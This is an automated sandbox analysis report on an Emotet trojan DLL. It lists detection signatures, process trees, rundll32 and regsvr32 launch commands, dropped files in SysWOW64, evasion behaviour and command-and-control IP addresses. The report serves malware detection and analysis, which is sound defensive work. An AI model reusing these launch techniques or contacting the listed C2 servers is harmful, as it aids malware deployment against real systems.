Windows Analysis Report
l2sFDHB0lp

Overview

General Information

Sample Name:l2sFDHB0lp (renamed file extension from none to dll)
Analysis ID:632747
MD5:b6ca42b6646e847ad826ebfc2e68d554
SHA1:cc06a349b47ca49503d5e2da477642c4fa95af8f
SHA256:91df13870c9b89883c0547af0c23b6c45d262781c593449a3356c0989ba88774
Tags:32, dll, exe, trojan

Detection

Emotet
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Antivirus / Scanner detection for submitted sample
Yara detected Emotet
System process connects to network (likely due to code injection or exploit)
Snort IDS alert for network traffic
Machine Learning detection for sample
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Contains functionality to query locales information (e.g. system language)
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
PE file contains strange resources
Tries to load missing DLLs
Drops PE files to the windows directory (C:\Windows)
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Connects to several IPs in different countries
Potential key logger detected (key state polling based)
Registers a DLL
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • loaddll32.exe (PID: 7064 cmdline: loaddll32.exe "C:\Users\user\Desktop\l2sFDHB0lp.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)
    • cmd.exe (PID: 7092 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\l2sFDHB0lp.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 7112 cmdline: rundll32.exe "C:\Users\user\Desktop\l2sFDHB0lp.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • regsvr32.exe (PID: 7100 cmdline: regsvr32.exe /s C:\Users\user\Desktop\l2sFDHB0lp.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
      • regsvr32.exe (PID: 5540 cmdline: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Tqddippvufllrd\rwkkp.rhz" MD5: 426E7499F6A7346F0410DEAD0805586B)
    • rundll32.exe (PID: 7124 cmdline: rundll32.exe C:\Users\user\Desktop\l2sFDHB0lp.dll,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 5644 cmdline: rundll32.exe C:\Users\user\Desktop\l2sFDHB0lp.dll,DllUnregisterServerr MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • svchost.exe (PID: 6468 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6244 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6748 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5092 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 3624 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup
Source | Rule | Description | Author | Strings
00000005.00000002.388781542.0000000000E51000.00000020.00001000.00020000.00000000.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
00000005.00000002.388781542.0000000000E51000.00000020.00001000.00020000.00000000.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
00000003.00000002.383767887.0000000000EB0000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
00000003.00000002.383767887.0000000000EB0000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
00000004.00000002.384631851.0000000000DD0000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security

Source | Rule | Description | Author | Strings
4.2.rundll32.exe.e20000.1.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
4.2.rundll32.exe.e20000.1.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
2.2.regsvr32.exe.41d0000.0.raw.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
2.2.regsvr32.exe.41d0000.0.raw.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
4.2.rundll32.exe.dd0000.0.raw.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security

No Sigma rule has matched
Timestamp:05/24/22-00:16:29.728687
Source IP:192.168.2.6
Destination IP:51.91.76.89
SID:2404336
Source Port:49785
Destination Port:8080
Protocol:TCP
Classtype:A Network Trojan was detected

AV Detection

Source: 3.2.rundll32.exe.eb0000.0.raw.unpack | Malware Configuration Extractor: Emotet
Source: l2sFDHB0lp.dll | Virustotal: Detection: 64%
Source: l2sFDHB0lp.dll | ReversingLabs: Detection: 68%
Source: l2sFDHB0lp.dll | Avira: detected
Source: l2sFDHB0lp.dll | Joe Sandbox ML: detected
Source: l2sFDHB0lp.dll | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 2_2_1002592C __EH_prolog,GetFullPathNameA,lstrcpynA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,lstrcpyA,2_2_1002592C
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_1002592C __EH_prolog,GetFullPathNameA,lstrcpynA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,lstrcpyA,3_2_1002592C
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 6_2_04D31B61 FindFirstFileW,6_2_04D31B61

Networking

Source: C:\Windows\SysWOW64\regsvr32.exe | Network Connect: 70.36.102.35 443
Source: C:\Windows\SysWOW64\regsvr32.exe | Network Connect: 51.91.76.89 8080
Source: C:\Windows\SysWOW64\regsvr32.exe | Network Connect: 92.240.254.110 8080
Source: Traffic | Snort IDS: 2404336 ET CNC Feodo Tracker Reported CnC Server TCP group 19 192.168.2.6:49785 -> 51.91.76.89:8080
Source: Joe Sandbox View | ASN Name: OVHFR OVHFR
Source: Joe Sandbox View | IP Address: 217.182.25.250 217.182.25.250
Source: Joe Sandbox View | IP Address: 151.106.112.196 151.106.112.196
Source: global traffic | TCP traffic: 192.168.2.6:49775 -> 92.240.254.110:8080
Source: global traffic | TCP traffic: 192.168.2.6:49785 -> 51.91.76.89:8080
Source: unknown | Network traffic detected: IP country count 28
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown | Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown | TCP traffic detected without corresponding DNS query: 70.36.102.35
Source: unknown | TCP traffic detected without corresponding DNS query: 92.240.254.110
Source: unknown | TCP traffic detected without corresponding DNS query: 51.91.76.89
                      Source: svchost.exe, 00000016.00000002.683376230.00000228C5900000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: svchost.exe, 00000016.00000002.683376230.00000228C5900000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.ver)
                      Source: regsvr32.exe, 00000006.00000002.896968983.00000000032D3000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.499973527.00000000032D2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/
                      Source: 77EC63BDA74BD0D0E0426DC8F80085060.6.dr String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                      Source: regsvr32.exe, 00000006.00000003.499011237.0000000005683000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?053f60a558195
                      Source: svchost.exe, 00000016.00000003.659235630.00000228C59BC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://help.disneyplus.com.
                      Source: svchost.exe, 00000016.00000003.659235630.00000228C59BC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://disneyplus.com/legal.
                      Source: svchost.exe, 00000016.00000003.654146864.00000228C59AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.654473366.00000228C599A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.654325113.00000228C59BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.654425192.00000228C5E02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.654134486.00000228C599A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.654367737.00000228C5E1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.654405514.00000228C5E1A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.hotspotshield.com/
                      Source: svchost.exe, 00000016.00000003.659235630.00000228C59BC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.disneyplus.com/legal/privacy-policy
                      Source: svchost.exe, 00000016.00000003.659235630.00000228C59BC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.disneyplus.com/legal/your-california-privacy-rights
                      Source: svchost.exe, 00000016.00000003.654146864.00000228C59AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.654473366.00000228C599A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.654325113.00000228C59BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.654425192.00000228C5E02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.654134486.00000228C599A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.654367737.00000228C5E1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.654405514.00000228C5E1A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.hotspotshield.com/terms/
                      Source: svchost.exe, 00000016.00000003.654146864.00000228C59AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.654473366.00000228C599A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.654325113.00000228C59BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.654425192.00000228C5E02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.654134486.00000228C599A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.654367737.00000228C5E1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.654405514.00000228C5E1A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.pango.co/privacy
                      Source: svchost.exe, 00000016.00000003.662945656.00000228C599A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.tiktok.com/legal/report/feedback
                      Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_04D3F766 InternetReadFile,6_2_04D3F766
                      Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_10032A2D GetKeyState,GetKeyState,GetKeyState,GetFocus,GetDesktopWindow,SendMessageA,SendMessageA,GetParent,2_2_10032A2D
                      Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_1003437E GetKeyState,GetKeyState,GetKeyState,2_2_1003437E
                      Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_1002FE1B ScreenToClient,GetKeyState,GetKeyState,GetKeyState,KillTimer,IsWindow,2_2_1002FE1B
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_10032A2D GetKeyState,GetKeyState,GetKeyState,GetFocus,GetDesktopWindow,SendMessageA,SendMessageA,GetParent,3_2_10032A2D
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_1003437E GetKeyState,GetKeyState,GetKeyState,3_2_1003437E
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_1002FE1B ScreenToClient,GetKeyState,GetKeyState,GetKeyState,KillTimer,IsWindow,3_2_1002FE1B

                      E-Banking Fraud

                      Source: Yara match File source: 4.2.rundll32.exe.e20000.1.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 2.2.regsvr32.exe.41d0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 4.2.rundll32.exe.dd0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 6.2.regsvr32.exe.3190000.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 3.2.rundll32.exe.eb0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 3.2.rundll32.exe.eb0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 4.2.rundll32.exe.dd0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 6.2.regsvr32.exe.4d30000.1.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.2.rundll32.exe.e20000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.2.rundll32.exe.e20000.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 2.2.regsvr32.exe.41d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 6.2.regsvr32.exe.3190000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.2.rundll32.exe.e50000.1.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 2.2.regsvr32.exe.4200000.1.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 3.2.rundll32.exe.4870000.1.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 00000005.00000002.388781542.0000000000E51000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000003.00000002.383767887.0000000000EB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000004.00000002.384631851.0000000000DD0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000005.00000002.388750186.0000000000E20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000006.00000002.897035538.0000000004D31000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000006.00000002.896680035.0000000003190000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000004.00000002.384673392.0000000000E21000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000002.00000002.387530383.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000002.00000002.387558358.0000000004201000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000003.00000002.384161260.0000000004871000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: l2sFDHB0lp.dll Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED
                      Source: C:\Windows\SysWOW64\regsvr32.exe File deleted: C:\Windows\SysWOW64\Tqddippvufllrd\rwkkp.rhz:Zone.Identifier
                      Source: C:\Windows\SysWOW64\regsvr32.exe File created: C:\Windows\SysWOW64\Tqddippvufllrd\
                      Source: C:\Windows\SysWOW64\regsvr32.exe Code function: String function: 10011BF0 appears 110 times
                      Source: C:\Windows\SysWOW64\regsvr32.exe Code function: String function: 10012514 appears 40 times
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 10011BF0 appears 110 times
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 10012514 appears 40 times
                      Source: l2sFDHB0lp.dll Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
                      Source: l2sFDHB0lp.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: sfc.dll
                      Source: l2sFDHB0lp.dll Virustotal: Detection: 64%
                      Source: l2sFDHB0lp.dll ReversingLabs: Detection: 68%
                      Source: l2sFDHB0lp.dll Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknown Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\l2sFDHB0lp.dll"
                      Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\l2sFDHB0lp.dll",#1
                      Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\l2sFDHB0lp.dll
                      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\l2sFDHB0lp.dll",#1
                      Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\l2sFDHB0lp.dll,DllRegisterServer
                      Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\l2sFDHB0lp.dll,DllUnregisterServerr
                      Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Tqddippvufllrd\rwkkp.rhz"
                      Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                      Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Windows\SysWOW64\regsvr32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{D105A4D4-344C-48EB-9866-EE378D90658B}\InProcServer32
                      Source: classification engine Classification label: mal100.troj.evad.winDLL@18/2@0/59
                      Source: C:\Windows\SysWOW64\regsvr32.exe File read: C:\Users\desktop.ini
                      Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_04D49941 CreateToolhelp32Snapshot,6_2_04D49941
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\l2sFDHB0lp.dll",#1
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_10006120 FindResourceW,LoadResource,SizeofResource,VirtualAllocExNuma,VirtualAlloc,memcpy,malloc,??3@YAXPAX@Z,2_2_10006120
                      Source: C:\Windows\SysWOW64\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: l2sFDHB0lp.dllStatic PE information: section name: RT_CURSOR
                      Source: l2sFDHB0lp.dllStatic PE information: section name: RT_BITMAP
                      Source: l2sFDHB0lp.dllStatic PE information: section name: RT_ICON
                      Source: l2sFDHB0lp.dllStatic PE information: section name: RT_MENU
                      Source: l2sFDHB0lp.dllStatic PE information: section name: RT_DIALOG
                      Source: l2sFDHB0lp.dllStatic PE information: section name: RT_STRING
                      Source: l2sFDHB0lp.dllStatic PE information: section name: RT_ACCELERATOR
                      Source: l2sFDHB0lp.dllStatic PE information: section name: RT_GROUP_ICON
                      Source: l2sFDHB0lp.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                      Source: l2sFDHB0lp.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                      Source: l2sFDHB0lp.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                      Source: l2sFDHB0lp.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                      Source: l2sFDHB0lp.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_10010B20 push eax; ret 2_2_10010B34
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_10010B20 push eax; ret 2_2_10010B5C
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_10011BF0 push eax; ret 2_2_10011C0E
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_1001254F push ecx; ret 2_2_1001255F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10010B20 push eax; ret 3_2_10010B34
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10010B20 push eax; ret 3_2_10010B5C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10011BF0 push eax; ret 3_2_10011C0E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1001254F push ecx; ret 3_2_1001255F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00E210BB push ebx; ret 4_2_00E210C6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00E2179E push ds; retf 4_2_00E2179F
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04D310BB push ebx; ret 6_2_04D310C6
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04D3179E push ds; retf 6_2_04D3179F
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_10025CEC __EH_prolog,LoadLibraryA,GetProcAddress,2_2_10025CEC
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\l2sFDHB0lp.dll
                      Source: C:\Windows\SysWOW64\regsvr32.exePE file moved: C:\Windows\SysWOW64\Tqddippvufllrd\rwkkp.rhzJump to behavior

                      Hooking and other Techniques for Hiding and Protection

                      Source: C:\Windows\SysWOW64\regsvr32.exe; File opened: C:\Windows\SysWOW64\Tqddippvufllrd\rwkkp.rhz:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exe; File opened: C:\Windows\SysWOW64\Brfwiueuvyuxb\wegmuixkmip.qwo:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exe; File opened: C:\Windows\SysWOW64\Zauszwyfobkk\vwar.kzf:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\regsvr32.exe; Code function: 2_2_10007AE5 IsIconic,GetWindowPlacement,GetWindowRect,2_2_10007AE5
                      Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 3_2_10007AE5 IsIconic,GetWindowPlacement,GetWindowRect,3_2_10007AE5
                      Source: C:\Windows\SysWOW64\regsvr32.exe; Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                      Source: C:\Windows\SysWOW64\rundll32.exe; Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exe; Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exe; Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exe; Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exe; Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exe TID: 2316; Thread sleep time: -60000s >= -30000s
                      Source: C:\Windows\SysWOW64\regsvr32.exe; API coverage: 2.4 %
                      Source: C:\Windows\SysWOW64\rundll32.exe; API coverage: 2.7 %
                      Source: C:\Windows\SysWOW64\regsvr32.exe; Process information queried: ProcessInformation
                      Source: C:\Windows\SysWOW64\regsvr32.exe; Code function: 2_2_10010839 VirtualQuery,GetSystemInfo,VirtualQuery,VirtualAlloc,VirtualProtect,2_2_10010839
                      Source: C:\Windows\SysWOW64\regsvr32.exe; Code function: 2_2_1002592C __EH_prolog,GetFullPathNameA,lstrcpynA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,lstrcpyA,2_2_1002592C
                      Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 3_2_1002592C __EH_prolog,GetFullPathNameA,lstrcpynA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,lstrcpyA,3_2_1002592C
                      Source: C:\Windows\SysWOW64\regsvr32.exe; Code function: 6_2_04D31B61 FindFirstFileW,6_2_04D31B61
                      Source: C:\Windows\SysWOW64\regsvr32.exe; API call chain: ExitProcess graph end node, graph_2-20230
                      Source: C:\Windows\SysWOW64\rundll32.exe; API call chain: ExitProcess graph end node, graph_3-20319
                      Source: C:\Windows\SysWOW64\regsvr32.exe; File Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exe; File Volume queried: C:\ FullSizeInformation
                      Source: svchost.exe, 0000000C.00000002.896718470.000001D10C802000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
                      Source: svchost.exe, 00000016.00000002.683113383.00000228C5088000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.683249277.00000228C50EE000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW
                      Source: svchost.exe, 0000000C.00000002.896783916.000001D10C828000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Windows\SysWOW64\regsvr32.exe; Code function: 2_2_10025CEC __EH_prolog,LoadLibraryA,GetProcAddress,2_2_10025CEC
                      Source: C:\Windows\SysWOW64\regsvr32.exe; Code function: 2_2_10005260 GetNativeSystemInfo,GetProcessHeap,HeapAlloc,memcpy,2_2_10005260
                      Source: C:\Windows\System32\loaddll32.exe; Process queried: DebugPort

                      HIPS / PFW / Operating System Protection Evasion

                      Source: C:\Windows\SysWOW64\regsvr32.exe; Network Connect: 70.36.102.35 443
                      Source: C:\Windows\SysWOW64\regsvr32.exe; Network Connect: 51.91.76.89 8080
                      Source: C:\Windows\SysWOW64\regsvr32.exe; Network Connect: 92.240.254.110 8080
                      Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\l2sFDHB0lp.dll",#1
                      Source: C:\Windows\SysWOW64\regsvr32.exe; Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\regsvr32.exe; Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\regsvr32.exe; Code function: GetThreadLocale,GetLocaleInfoA,GetACP,2_2_10001090
                      Source: C:\Windows\SysWOW64\regsvr32.exe; Code function: lstrcpyA,LoadLibraryA,GetLocaleInfoA,2_2_100348C4
                      Source: C:\Windows\SysWOW64\regsvr32.exe; Code function: GetLocaleInfoA,2_2_1001A444
                      Source: C:\Windows\SysWOW64\rundll32.exe; Code function: GetThreadLocale,GetLocaleInfoA,GetACP,3_2_10001090
                      Source: C:\Windows\SysWOW64\rundll32.exe; Code function: lstrcpyA,LoadLibraryA,GetLocaleInfoA,3_2_100348C4
                      Source: C:\Windows\SysWOW64\rundll32.exe; Code function: GetLocaleInfoA,3_2_1001A444
                      Source: C:\Windows\SysWOW64\regsvr32.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: C:\Windows\SysWOW64\regsvr32.exe; Code function: 2_2_10011075 GetSystemTimeAsFileTime,__aulldiv,2_2_10011075
                      Source: C:\Windows\SysWOW64\regsvr32.exe; Code function: 2_2_10018E14 __lock,_strlen,_strncpy,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,_strncpy,2_2_10018E14
                      Source: C:\Windows\SysWOW64\regsvr32.exe; Code function: 2_2_10001100 GetVersionExA,InterlockedExchange,2_2_10001100

                      Stealing of Sensitive Information

                      Source: Yara match; File source: 4.2.rundll32.exe.e20000.1.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 2.2.regsvr32.exe.41d0000.0.raw.unpack, type: UNPACKEDPE
